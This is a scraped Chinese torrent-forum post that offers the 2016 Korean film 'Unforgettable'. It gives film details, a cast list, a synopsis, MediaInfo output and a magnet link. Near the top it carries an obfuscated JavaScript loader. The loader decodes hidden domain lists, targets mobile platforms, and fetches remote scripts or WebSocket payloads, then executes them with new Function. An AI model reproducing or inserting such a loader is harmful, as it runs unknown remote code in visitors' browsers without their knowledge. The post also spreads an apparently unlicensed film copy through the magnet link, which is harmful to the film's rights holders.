纯情[简繁字幕].Unforgettable.2016.1080p.WEB-DL.H265.AAC 2.24GB

版主小s 1月前 1175

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 纯情 / 恋上初夏(港) / Unforgettable / Soonjung
◎片  名 ??
◎年  代 2016
◎产  地 韩国
◎类  别 剧情 / 爱情
◎语  言 韩语
◎上映日期 2016-02-24(韩国)
◎IMDb链接 https://www.imdb.com/title/tt5615904/
◎豆瓣评分 7.4/10 (13120人评价)
◎豆瓣链接 https://movie.douban.com/subject/26416169/
◎片  长 113分钟
◎编  剧 洪昌杓 Hong Chang-Pyo (id:1387401)
◎演  员 都暻秀 Kyung-soo Doh (id:1336965)
       金所泫 So-hyun Kim (id:1318725)
       李大卫 David Lee (id:1326902)
       朱多英 Da-Yeong Ju (id:1339893)
       延俊锡 Joon-seok Yeon (id:1338504)
       林成宰 Sungjae Im (id:1444305)
       吴宥真 Yoo-jin Oh (id:1433097)
       裴长秀 Jang-su Bae (id:1424325)
       朴海俊 Hea-jun Park (id:1337809)
       柳淳哲 Sun-cheol Yu (id:1373553)
       金芝荷 Ji-ho Kim (id:1332700)
       朱雅凛 Ah-reum Joo (id:1459104)

◎标  签 韩国 / 青春 / 爱情 / 友情 / 纯情 / 成长 / 感动 / 文艺

◎简  介
  电影《纯情》讲述了一封在音乐节目直播过程中收到的来自23年前的信所引发的故事,描述了超越过去与现在的初恋和5名朋友之间的友情。片中,都暻秀饰演性格木讷但一片丹心的范实,金所炫饰演拥有天籁美声的少女秀玉。                                    
                                据了解,《纯情》将在今年夏天拍摄,预计於2016年2月上映,拍摄地点在全罗南道高兴郡。此前都暻秀通过电影《Cart》、电视剧《没关系,是爱情啊》、《记得你》展现精湛演技。而童星出身的金所炫更有着丰富的戏剧经验,主演了电视剧《想你》《Reset》《Who Are You-学校2015》等热播韩剧。2014年金所炫主演KBS一集特别企划剧《不一样的哭泣》,并凭借此剧在年末KBS演技大赏中获得女子部独幕剧奖。此次电影中与EXO D.O.合作主演,是金所炫首次担纲女主角,金所炫也表示感觉演戏很幸福,只要跟着哥哥就对了 。

◎获奖情况 (共1项)
  第52届百想艺术大赏 (2016)
  电影类 最佳人气男演员
   └──都暻秀 (id:1336965)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 63963502191120550698747613278059899167 (0x301EEC23D56006657E1D6CFF7E88291F)

  4. Complete name                            : [email protected]

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 2.24 GiB

  8. Duration                                 : 1 h 53 min

  9. Overall bit rate                         : 2 813 kb/s

  10. Encoded date                             : UTC 2021-08-05 12:11:18

  11. Writing application                      : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : [email protected]@Main

  18. Codec ID                                 : V_MPEGH/ISO/HEVC

  19. Duration                                 : 1 h 53 min

  20. Bit rate                                 : 2 620 kb/s

  21. Width                                    : 1 920 pixels

  22. Height                                   : 792 pixels

  23. Display aspect ratio                     : 2.40:1

  24. Frame rate mode                          : Constant

  25. Frame rate                               : 24.000 FPS

  26. Color space                              : YUV

  27. Chroma subsampling                       : 4:2:0

  28. Bit depth                                : 8 bits

  29. Bits/(Pixel*Frame)                       : 0.072

  30. Stream size                              : 2.08 GiB (93%)

  31. Default                                  : Yes

  32. Forced                                   : No


  33. Audio

  34. ID                                       : 2

  35. Format                                   : AAC LC

  36. Format/Info                              : Advanced Audio Codec Low Complexity

  37. Codec ID                                 : A_AAC-2

  38. Duration                                 : 1 h 53 min

  39. Bit rate                                 : 192 kb/s

  40. Channel(s)                               : 2 channels

  41. Channel layout                           : L R

  42. Sampling rate                            : 44.1 kHz

  43. Frame rate                               : 43.066 FPS (1024 SPF)

  44. Compression mode                         : Lossy

  45. Stream size                              : 155 MiB (7%)

  46. Language                                 : Korean

  47. Default                                  : Yes

  48. Forced                                   : No


  49. Text #1

  50. ID                                       : 3

  51. Format                                   : UTF-8

  52. Codec ID                                 : S_TEXT/UTF8

  53. Codec ID/Info                            : UTF-8 Plain Text

  54. Duration                                 : 1 h 50 min

  55. Bit rate                                 : 40 b/s

  56. Count of elements                        : 1385

  57. Stream size                              : 32.7 KiB (0%)

  58. Title                                    : Chinese Simplified

  59. Language                                 : Chinese

  60. Default                                  : Yes

  61. Forced                                   : No


  62. Text #2

  63. ID                                       : 4

  64. Format                                   : UTF-8

  65. Codec ID                                 : S_TEXT/UTF8

  66. Codec ID/Info                            : UTF-8 Plain Text

  67. Duration                                 : 1 h 50 min

  68. Bit rate                                 : 40 b/s

  69. Count of elements                        : 1385

  70. Stream size                              : 32.7 KiB (0%)

  71. Title                                    : Chinese Traditional

  72. Language                                 : Chinese

  73. Default                                  : No

  74. Forced                                   : No


  75. Text #3

  76. ID                                       : 5

  77. Format                                   : UTF-8

  78. Codec ID                                 : S_TEXT/UTF8

  79. Codec ID/Info                            : UTF-8 Plain Text

  80. Duration                                 : 1 h 50 min

  81. Bit rate                                 : 39 b/s

  82. Count of elements                        : 1168

  83. Stream size                              : 31.9 KiB (0%)

  84. Title                                    : English

  85. Language                                 : English

  86. Default                                  : No

  87. Forced                                   : No



TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:BEDA810F9EED41FB26F81FBCFD4429D1F1C78734
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回